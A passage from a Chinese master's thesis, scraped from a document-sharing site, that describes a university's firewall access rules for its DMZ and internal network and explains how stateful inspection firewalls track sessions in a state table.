仅允许下列服务访问江汉大学内部局域网上指定的主机:d n s 、f t p 、h t t p 、 i c m p 、s m t p 、s q l n e t 、弹t p 、t e l n e t 、r t e l n e t 、s n m p 、s n m p t r a p s 以及某 些应用指定的服务 3 ) 对于江汉大学内部局域网络: 仅允许来自d m z 区域的下列服务访问指定的主机:d n s 、f t p 、h t t p 、i c m p 、 s m t p 、s q l n e t 、t f t p 、t e l n e t 、r t e l n e t 、s n m p 、s n m p t r a p s 以及某些应用指 华中科技大学硕士学位论文 定的服务,拒绝来自公共网络的所有服务的访问,允许所有服务访问不设防区和公共 网络。 2 3 2 防火墙的作用及不足 防火墙有包过滤防火墙、状态检测防火墙、代理防火墙。我校部署的f w 4 0 0 防 火墙是状态检测防火墙。下面以它的工作原理来分析它在网络安全中的作用及不足。 1 ) 状态检测防火墙的工作原理 状态过滤防火墙主要检查第四层( 传输) 和更低层的报文信息,大部分经常只对 初始化连接的那个报文进行第七层( 应用) 的检查。如果一条现有的防火墙规则允许 该报文通过,就向状态表中添加项。并且允许在该特定通信会话中从那之后的所有 报文,而无须对期做进一步的检查,这是因为它们匹配了一个现有的状态表项。这种 方法提高了防火墙的整体性能,因为它只需要对最初的报文一直解封装到应用层。 为了更好地理解它的功能,我们下面来讨论什么是状态以及它在网络通信中是如 何跟踪状态。 2 ) 状态的概念 状态( s t a t e ) 是一个给定通信会话存在的条件。对于给定的主机或会话,这个存 在条件的定义有很大的不同,它依赖于各方进行通信所用的应用程序以及进行交换所 用的协议。 跟踪状态的设备通常使用一个表来跟踪状态。这个状态表的每一项代表了该设备 所知道的单个通信会话。每一项都保存可唯一标识了它所代表的通信会话的信息条 目,这些信息包括源和目的i p 地址信息、标志、顺序和应答信号等。当穿过有状态 设备发出一条连接时,就会创建一个状态表项;之后,当通信返回时,设
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 2026机械制造行业自动化库存追踪技术商业机会评估报告
- 2026散装海鲜行业市场现状供需分析及投资潜力评估研究报告
- 胃肠镜检查前后护理评估及诊断
- 七年级生物下册 第四单元 生物圈中的人 第二章 人体的营养第三节 关注合理营养与食品安全教案 (新版)新人教版
- 简单的单位换算(教学设计)数学二年级下册苏教版
- 排球模块3 扣近网球 教学设计-2023-2024学年高一上学期体育与健康人教版必修第一册
- 美丽的家乡(教学设计)人教版(2012)音乐五年级下册
- 高中数学 2.2.2 直线的两点式方程教学设计 新人教A版选择性必修第一册
- 人教版历史与社会八下7.3《资本主义的扩展》教学设计1
- 闽教版信息技术四年级下册《第二单元 镜头下的美丽世界 8 组接镜头串主题》教学设计
- TGDACM 0174-2026 中医技术操作规范 温通拨筋罐疗法
- 2025年体外诊断IVD行业研究报告
- 机器人胰十二指肠切除术
- 风湿免疫科临床常用评分量表
- 2026年广西壮族自治区玉林市初二数学上册期末考试试卷及答案
- DB44∕T 2741-2025 市政基础设施用地节约集约化利用标准
- GB/T 46601-2025热喷涂采用横向划痕试验评估热喷涂陶瓷涂层的结合力和内聚力
- 创伤性应激障碍课件
- 2026年秋学期人教版初中语文九年级上册教学进度表
- 2025鄂尔多斯市城市建设投资集团招聘92人笔试历年参考题库附带答案详解(3卷合一)
- 中职会计统计讲解
评论
0/150
提交评论